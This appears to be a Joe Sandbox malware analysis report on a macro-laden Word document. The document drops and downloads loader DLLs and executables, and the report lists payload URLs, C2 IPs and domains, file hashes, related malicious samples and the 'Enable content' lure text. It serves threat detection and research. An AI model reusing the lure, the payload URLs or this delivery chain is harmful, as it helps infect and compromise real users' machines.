        • Found application associated with file extension: .doc
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe
        • Report size getting too big, too many NtQueryAttributesFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        17:27:36API Interceptor1x Sleep call for process: rundll32.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        45.8.146.139feltenberger doc 08.11.docGet hashmaliciousBrowse
        • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
        agsilverfile08.11.docGet hashmaliciousBrowse
        • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
        64.227.108.27aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dllGet hashmaliciousBrowse
        • alexbionka.com/
        9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dllGet hashmaliciousBrowse
        • alexbionka.com/
        feltenberger doc 08.11.docGet hashmaliciousBrowse
        • alexbionka.com/
        agsilverfile08.11.docGet hashmaliciousBrowse
        • alexbionka.com/
        giveThereWhichCouldHis.dllGet hashmaliciousBrowse
        • qropalhouse.com/

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        alexbionka.comaaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dllGet hashmaliciousBrowse
        • 64.227.108.27
        9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dllGet hashmaliciousBrowse
        • 64.227.108.27
        feltenberger doc 08.11.docGet hashmaliciousBrowse
        • 64.227.108.27
        agsilverfile08.11.docGet hashmaliciousBrowse
        • 64.227.108.27

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        VMAGE-ASRUfeltenberger doc 08.11.docGet hashmaliciousBrowse
        • 45.8.146.139
        agsilverfile08.11.docGet hashmaliciousBrowse
        • 45.8.146.139
        GitmEGG60Q.exeGet hashmaliciousBrowse
        • 45.159.251.68
        80J4pAFU0A.exeGet hashmaliciousBrowse
        • 45.159.248.53
        Rwwsr82vkS.exeGet hashmaliciousBrowse
        • 45.159.248.53
        sJq1pykxns.exeGet hashmaliciousBrowse
        • 45.159.248.53
        3RkGCbnoKw.exeGet hashmaliciousBrowse
        • 45.159.248.53
        60MLnq8Uma.exeGet hashmaliciousBrowse
        • 45.159.248.53
        uGfpJynSWM.exeGet hashmaliciousBrowse
        • 45.159.249.4
        MqYQkpHt4V.exeGet hashmaliciousBrowse
        • 45.159.248.53
        0LYwkmJsgj.exeGet hashmaliciousBrowse
        • 45.159.248.53
        P5u1ZAL6wF.exeGet hashmaliciousBrowse
        • 45.159.248.53
        VbeTpPMvvK.exeGet hashmaliciousBrowse
        • 45.159.248.53
        e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
        • 45.159.248.53
        aTlGCwT504.exeGet hashmaliciousBrowse
        • 45.159.248.53
        a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
        • 45.159.248.53
        lFqE59erhf.exeGet hashmaliciousBrowse
        • 45.8.144.151
        eW9zvrPzHg.exeGet hashmaliciousBrowse
        • 45.159.251.105
        spotify premium crack download 2022.exeGet hashmaliciousBrowse
        • 45.159.249.4
        jh6gyqcWFO.exeGet hashmaliciousBrowse
        • 45.159.249.5

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exefeltenberger doc 08.11.docGet hashmaliciousBrowse
          agsilverfile08.11.docGet hashmaliciousBrowse
            ino.file.18.07.2022.docGet hashmaliciousBrowse
              md-srl.doc.29.07.22.docGet hashmaliciousBrowse
                [redacted]-document-26.07.22.docGet hashmaliciousBrowse
                  [redacted]-doc-26.07.docGet hashmaliciousBrowse
                    confinalp.file.26.07.22.docGet hashmaliciousBrowse
                      alhena-doc-26.07.2022.docGet hashmaliciousBrowse
                        andreademarchi invoice 26.07.22.docGet hashmaliciousBrowse
                          technographsri invoice 26.07.2022.docGet hashmaliciousBrowse
                            377155250.docGet hashmaliciousBrowse
                              pelagagge_doc_22.07.22.docGet hashmaliciousBrowse
                                12658371_dynamicom-invoice-18.07.22.docGet hashmaliciousBrowse
                                  [redacted],file,18.07.docGet hashmaliciousBrowse
                                    istitutomargherita.file.18.07.docGet hashmaliciousBrowse
                                      gruppobluecity invoice 18.07.22.docGet hashmaliciousBrowse
                                        bbdy_document_07.06.2022.docGet hashmaliciousBrowse
                                          tcrc-central-le file 07.01.22.docGet hashmaliciousBrowse
                                            ida,file,07.01.2022.docGet hashmaliciousBrowse
                                              gol document 07.01.2022.docGet hashmaliciousBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                Category:downloaded
                                                Size (bytes):360448
                                                Entropy (8bit):4.669605444265748
                                                Encrypted:false
                                                SSDEEP:6144:4YCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:/CwMfjSlE+A4eguRJDtPZIG46FkEH9
                                                MD5:18CC94DD7BBBFF54DF547A4F47346F01
                                                SHA1:B13786283F076A3E95BEDF277C4AD5CCF74D407E
                                                SHA-256:2FFB609277439F8D2F4E2716C54F282030BA717A59234098F364205BCF37FE9C
                                                SHA-512:798FB93688E812ED1AC854B9B4CF93E2A5BD5A3602CFED7F266B64526480A2102527C310513726800F6390D47E3F37444C0B4E90945B92EA73A6FA13328E5B67
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:low
                                                IE Cache URL:http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C2DDEE.png

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):256043
                                                Entropy (8bit):7.978649843052502
                                                Encrypted:false
                                                SSDEEP:3072:oHOxTlIBnmM5ZwN3oWcuwnPlWUHeMlJ3NsT51XIcxe38wh06q6vOYgMC4Gy0HBZ8:5TJ+K2P5lmDICe38wi6vrgLRiw981
                                                MD5:D3341817BB7485FA43E737DDCCFCDA50
                                                SHA1:B14836FF62F326C98E26218754BBFE85DBA7A654
                                                SHA-256:A2482A832CC317A2D773F9FCDFCF843ED8E84597F9B382DB0420DC5578D56943
                                                SHA-512:AE51BACA31BAFD99D370531AD8E2E92EF4B38AACAF8E2684E9D23BDB8C0E85D23E2CDED482D314A30C364D5F6071D9B7F8E61D98656A8532C56409906B2AB920
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....nGU.39..........[..((.QPQD..)a...Z.m s..aHB...3........@....F.f......s..0&.}...{.^'.Vj.....U.V..].........8.-.g.."i.:c....>q..^Y.zm...2Zy...7e.,Kz"...t..@.;&....W.....3.._I...e...../.g......jy....^.D.W>P...?.-...t.1H...Z..|+#yj..*o.t.#c^9.<q.?A:C.....-.'...4.J...h.7BO^b.. ......^H...ytH}..3TT.J..Z...S..t.......6^F%.n..+.N.j..--.x.+OE[.W..@...V.. .-*./nQ.\.Z....A.^)..r0......-o.......@.......t^.P....<..-*O.....+O.3..k.....v.gH..^..ZP...q.1z...7..Uv..P..hIo.P..^>q(|5...=....{< .*...Z.<3.... ..!..Z.[.|.2...^Qy..F.D...5.h.eY..I..5.2zh..z..Hg...K..TZ..{.JO.h`..%.....Wz-.-....3$ZZ..hi.N....q...6...h...Y....1 ..........%....y.ZF:CE....5.uj.....+-Qi5.y4P.-r-.<c....vn..D..C....1.Hz.UIP.@.'.PPy.z.. ..*Q.-=..**O.+V...W.$O.-ZZ..Kgh....."e.._..=Tz....&OO.D..1.tPuLz.+=Qic<.Z.m.C.y.U....%..S.....Tz.g.E..[i..ec.W..jY.-j.<.1..mY....5N.<...2.KW. ...6...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9B901917.png

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61935
                                                Entropy (8bit):7.988218918927523
                                                Encrypted:false
                                                SSDEEP:1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
                                                MD5:4800E90C87A78932178C7D338BA32F43
                                                SHA1:8006244EDAFF9A31546A17FCF99CB61DA4F69417
                                                SHA-256:8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
                                                SHA-512:58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...*I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I|......|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V*../$)...."%...F....~...s.1@|.....dE.8D|..d..........N.z..(...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.683375190196064
                                                Encrypted:false
                                                SSDEEP:192:l1KtgbJDmX7JF93b2kDa5t66JDmX7JF93b2kDa:qtuJDmX1rL2kCtBJDmX1rL2k
                                                MD5:B3FD623B10C21C4D9E09B7C2ED46EC94
                                                SHA1:5559EBDBE5EFA2168603E0D45027BE8D6B786DFD
                                                SHA-256:22CDFE14057F98D3DAA54DAE160CAACD13A102B9DDEDF9A125B677BA47A9106E
                                                SHA-512:2E71D038117B22F890E1372CBBE5E4FB4F80826CA9DD9A99EA0ED8CBC3DABC85AE6D0E5E9BA5500D43A6A4934C05EB3CA516DECBFBCCA8F6F291E6C3F4E4F9FA
                                                Malicious:false
                                                Reputation:low
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4221A912-2B82-4834-A4D3-95CF1F77F776}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{732CEB61-1F3E-4038-9230-0F099F2E5FCD}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):2.1363686128594344
                                                Encrypted:false
                                                SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lI+kwkvdQ473W4wW4PllZWHkUZr8/W4c:4LG1ND9Pxn829k/Qq3W/WYbWHlJz
                                                MD5:FACB03470AEE19DAA10713FEC41483C1
                                                SHA1:A46E994A7888A44E3A580FF74E15001B3F502B86
                                                SHA-256:68FEED0A8607FD49B36FC442D519336DDD2FBCB229C4E7B2F221CD1A49F5662B
                                                SHA-512:9929AD4BA1CB5E7E898092390D8E4F12F23A072B85BD399C6EE40B1A9110BB3DA483299A6459264FDE4E1734E17ADA0AA921800BBF1F9BE351063DEFA922A64F
                                                Malicious:false
                                                Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):44544
                                                Entropy (8bit):6.056689486584974
                                                Encrypted:false
                                                SSDEEP:768:mD+ellQvZSazSRqbSEln5IyYpamDjobj8SpM:E+QWvZhSRqln5IUmDjoXV
                                                MD5:51138BEEA3E2C21EC44D0932C71762A8
                                                SHA1:8939CF35447B22DD2C6E6F443446ACC1BF986D58
                                                SHA-256:5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
                                                SHA-512:794F30FE452117FF2A26DC9D7086AAF82B639C2632AC2E381A81F5239CAAEC7C96922BA5D2D90BFD8D74F0A6CD4F79FBDA63E14C6B779E5CF6834C13E4E45E7D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: feltenberger doc 08.11.doc, Detection: malicious, Browse
                                                • Filename: agsilverfile08.11.doc, Detection: malicious, Browse
                                                • Filename: ino.file.18.07.2022.doc, Detection: malicious, Browse
                                                • Filename: md-srl.doc.29.07.22.doc, Detection: malicious, Browse
                                                • Filename: [redacted]-document-26.07.22.doc, Detection: malicious, Browse
                                                • Filename: [redacted]-doc-26.07.doc, Detection: malicious, Browse
                                                • Filename: confinalp.file.26.07.22.doc, Detection: malicious, Browse
                                                • Filename: alhena-doc-26.07.2022.doc, Detection: malicious, Browse
                                                • Filename: andreademarchi invoice 26.07.22.doc, Detection: malicious, Browse
                                                • Filename: technographsri invoice 26.07.2022.doc, Detection: malicious, Browse
                                                • Filename: 377155250.doc, Detection: malicious, Browse
                                                • Filename: pelagagge_doc_22.07.22.doc, Detection: malicious, Browse
                                                • Filename: 12658371_dynamicom-invoice-18.07.22.doc, Detection: malicious, Browse
                                                • Filename: [redacted],file,18.07.doc, Detection: malicious, Browse
                                                • Filename: istitutomargherita.file.18.07.doc, Detection: malicious, Browse
                                                • Filename: gruppobluecity invoice 18.07.22.doc, Detection: malicious, Browse
                                                • Filename: bbdy_document_07.06.2022.doc, Detection: malicious, Browse
                                                • Filename: tcrc-central-le file 07.01.22.doc, Detection: malicious, Browse
                                                • Filename: ida,file,07.01.2022.doc, Detection: malicious, Browse
                                                • Filename: gol document 07.01.2022.doc, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V|.....,...,...,.eO,...,.eI,...,...,v..,.e^,...,.eY,...,.eN,...,.eK,...,Rich...,........PE..L...7.[J.................:...p...............P............................................@..................................@..x....`..`g......................P...<I..8...........................8&..@...p...l............@..@....................text....9.......:.................. ..`.data........P.......>..............@....rsrc...`g...`...h...B..............@..@.reloc..P...........................@..B..[J0.../.[J=...o.[JH.....[JS.....[J`...........KERNEL32.dll.USER32.dll.msvcrt.dll.imagehlp.dll.ntdll.dll...............................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):360448
                                                Entropy (8bit):4.669605444265748
                                                Encrypted:false
                                                SSDEEP:6144:4YCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:/CwMfjSlE+A4eguRJDtPZIG46FkEH9
                                                MD5:18CC94DD7BBBFF54DF547A4F47346F01
                                                SHA1:B13786283F076A3E95BEDF277C4AD5CCF74D407E
                                                SHA-256:2FFB609277439F8D2F4E2716C54F282030BA717A59234098F364205BCF37FE9C
                                                SHA-512:798FB93688E812ED1AC854B9B4CF93E2A5BD5A3602CFED7F266B64526480A2102527C310513726800F6390D47E3F37444C0B4E90945B92EA73A6FA13328E5B67
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\~DF4786325F45128C5F.TMP

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):60416
                                                Entropy (8bit):4.172593521527024
                                                Encrypted:false
                                                SSDEEP:768:jKnjb0tZxwWKaJF/rMjJ1dXCE1lpBL/XrfdRcoOMGeyIye2PGEaI:jqWx7KaH4F1dXzhBLjGEyeEGEaI
                                                MD5:59993E0E46B1E754351F61C0175A071F
                                                SHA1:E2698FA83715D154E1EBFF7EF9468A3C13D56A5B
                                                SHA-256:9B895731F67A932C3D6B53DD7BE9A9551E014D31BF06B169C91EE35718D998B2
                                                SHA-512:197FDD99D32C0911CA01C81E1AB3D9754D47B9FFF0AEEE785EC158040DC0EEB90CAC42E807B40E34499B2D341DCD3F4EBB0CB1DDDF4B5F7EA37247AA42B17863
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...A...K...C...D...E...F...G...H...I...J...;...L...M...N...O...P...Q...R...S.......`...V...W...X...Y...Z...]...\.......i..._...........b...c...d...e...f...g...h...[...j...k...t...m...n...o...p...q...r...s...^...........................

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dodsonimaging,file,08.11.2022.LNK

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Aug 11 23:27:16 2022, length=2203466, window=hide
                                                Category:dropped
                                                Size (bytes):1109
                                                Entropy (8bit):4.556591519488816
                                                Encrypted:false
                                                SSDEEP:12:8TVY0gXg/XAlCPCHaXNBQtB/SxXX+WYuY5imY4icvbCG9zl4HADtZ3YilMMEpxRR:8T2k/XT9SUnZbemG9pDv3qz4u7D
                                                MD5:7A9803AED26CBF0DC1D0074F4B0C32E7
                                                SHA1:C8BD62532D903BAB96D22533D94866DE0CEF2A6F
                                                SHA-256:F17C3AEE491E43CDCE86091040DFC9FDBB4674562B8CF04ADF4BAAFFF0526182
                                                SHA-512:AFF93121D72DA96AF5CB2B7F42A2CCB23762EF94C9519BBC6FCD58B30373F4B1BA50A7F438F3727057890BED590D5168BA2C078AE22FB7939F7678E8DFB3505D
                                                Malicious:false
                                                Preview:L..................F.... ...<r...3..<r...3..Us.F...J.!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.J.!..Ui. .DODSON~1.DOC..p......hT..hT..*...r.....'...............d.o.d.s.o.n.i.m.a.g.i.n.g.,.f.i.l.e.,.0.8...1.1...2.0.2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\210979\Users.user\Desktop\dodsonimaging,file,08.11.2022.doc.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.d.s.o.n.i.m.a.g.i.n.g.,.f.i.l.e.,.0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):109
                                                Entropy (8bit):4.718136592074459
                                                Encrypted:false
                                                SSDEEP:3:bDuMJlZIMg9omX18g+Mg9ov:bCSxg9E2g9y
                                                MD5:E28869B9DCA55802DD912623F282F342
                                                SHA1:A79867AEBA6C3B64392ECE7EEA2A48E6F4988430
                                                SHA-256:EFAFE8B739A6D1A7DF19C01FBE30850246F58DC935DF400AA24EA7BEB62EC869
                                                SHA-512:0B360FECB904D52BD1B0EE6164A673190FF27E7761D369AC1E716955270F88CCD560B55A4BDB8B6EDD064B725E2DC5CC9AF9FB354D3F9CE0CFB2A3FCB263FBDA
                                                Malicious:false
                                                Preview:[folders]..Templates.LNK=0..dodsonimaging,file,08.11.2022.LNK=0..[doc]..dodsonimaging,file,08.11.2022.LNK=0..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\Desktop\~$dsonimaging,file,08.11.2022.doc

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                                Static File Info

                                                General

                                                File type:Zip archive data, at least v2.0 to extract
                                                Entropy (8bit):7.99341108201784
                                                TrID:
                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                • ZIP compressed archive (8000/1) 7.92%
                                                File name:dodsonimaging,file,08.11.2022.doc
                                                File size:2298458
                                                MD5:db11828aed458eccfab30c367bc1bb2f
                                                SHA1:3487931f130485c82d21e9ef4155af0a8fd46c33
                                                SHA256:d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
                                                SHA512:912a9d23b444a26ee176777d5be88c6a58a3cbf85864d3e09a3a497bcd3858764f8a9b318ddb8c314eb5e521a6a59ebcf88842cd3d7f9ed6f87ab7d192a12513
                                                SSDEEP:49152:RZQvsaxwME576XnfwHM3SSx+LwC01/BvObZ4Yf/KUoDG1J7:SxwfeXsGQwC4wByh25
                                                TLSH:CFB533442D61A68BE52F6234C6462265F4DD4AB303ACFDAE117DCF7E8359D36B0B01E8
                                                File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

                                                File Icon

                                                Icon Hash:e4eea2aaa4b4b4a4

                                                Static OLE Info

                                                General

                                                Document Type:OpenXML
                                                Number of OLE Files:1

                                                OLE File "/opt/package/joesandbox/database/analysis/682555/sample/dodsonimaging,file,08.11.2022.doc"

                                                Indicators
                                                Has Summary Info:
                                                Application Name:
                                                Encrypted Document:False
                                                Contains Word Document Stream:True
                                                Contains Workbook/Book Stream:False
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:True

                                                Streams with VBA

                                                VBA File Name: ThisDocument.cls, Stream Size: 2874
                                                General
                                                Stream Path:VBA/ThisDocument
                                                VBA File Name:ThisDocument.cls
                                                Stream Size:2874
